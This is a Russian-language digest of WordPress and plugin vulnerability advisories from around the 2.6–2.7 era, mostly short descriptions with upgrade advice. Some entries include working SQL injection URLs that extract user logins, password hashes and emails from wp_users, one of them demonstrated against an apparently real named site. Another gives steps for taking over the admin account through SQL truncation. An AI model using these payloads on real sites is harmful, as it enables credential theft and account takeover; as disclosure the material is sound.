Уязвимость WordPress плагина fMoblog 2.1
Найдена уязвимость в WordPress плагине fMoblog, которая позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных WordPress. Уязвимость существует из-за недостаточной обработки входных данных в параметре «id». Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. # Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,gr oup_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users-- # Demo: http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group _concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
Уязвимость в WordPress MU < 2.7
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за ошибки в функции choose_primary_blog при проверке HOST заголовка. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Для устранения уязвимости рекомендуется обновить WordPress MU до версии 2.7 Подробности.
Уязвимость WordPress плагина WP-Forum 1.7.8
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «thread» сценарием forum_feed.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения. Эксплоит: http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL] http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*
Уязвимость в WordPress ниже 2.6.3
Если вы еще не обновили свой блог, до версии 2.7, которая на данный момент является финальной стабильной версией WordPress, возможно некоторые уязвимости в старых версиях WordPress заставят вас задуматься об этом. Jeremias Reith опубликовал уязвимость на сервис Bugtraq которая при удачном использовании позволяет злоумышленнику, получить доступ к панели администрирования вашего блога. Данная уязвимость исправлена в читать далее ..
Уязвимости в плагинах Media Holder и e-Commerce
Найдены уязвимости в WordPress-плагинах Media Holder и E-Commerce. На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога. Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп. Плагин e-Commerce используется для создания интернет-магазина на основе вашего WordPress-блога. Уязвимость в плагине WordPress Media Holder связана с ошибкой читать далее ..
Уязвимость SQL-инъекции в плагине WP Comment Remix
Найдена уязвимость в плагине WordPress - WP Comment Remix. Плагин предназначается для улучшения функций комментирования. Позволяет добавить функции цитирования и ответа на комментарии. На эту уязвимость уже написан эксплоит, который позволяет извлечь из блога-жертвы очень много, важных данных, таких как: Настройки блога и активные плагины Список пользователей блога Список администраторов блога Сам эскплоит можно скачать читать далее ..
Уязвимость усечения данных в SQL WordPress 2.6.1
Найдена новая уязвимость в WordPress 2.6.1 которая заключается в ошибке усечения данных в базе SQL. Идем по ссылке server.com/wp-login.php?action=register Регистрируемся как пользователь "admin x" и Ваш email Логин выглядит как admin[55 пробелов]х После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора. читать далее ..
Уязвимости в Contact Form ][ для WordPress
Найдена уязвимость в плагинах контактной формы WordPress - Contact Form версии 2.0.13 и ниже. Плохая защита от ботов: отсутствие капчи, позволяет спам-ботам отправлять неограниченное количество спам-сообщений администратору сайта. Использование функционала для рассылки спама: в форме контактов есть поле которое называется "Отправить копию самому себе", это настраивается в настройках плагина (CarbonCopy Ability), используя это поле, спам читать далее ..
Уязвимость WordPress Plugin Download Manager 0.2
Уязвимость в данном скрипте, дает возможность атакующему закачать любой файл, на сервер. Это становится возможным из-за ошибки проверки входных данных в файле upload.php. Исправления данной ошибки пока не существует, возможно будет выпущен патч, или ошибка будет исправлена в следующей версии WordPress. Пример использования данной уязвимости.
XSS уязвимость плагина Nextgen gallery
В плагине Nextgen Gallery, версии <= 0.96 была найдена уязвимость XSS Злоумышленник, может без авторизации использовать следующий скрипт: http://[host]/[directory]/wp-admin/admin.php?page=nggallery-manage-gallery Насколько известно, исправлений в данный момент не существует.
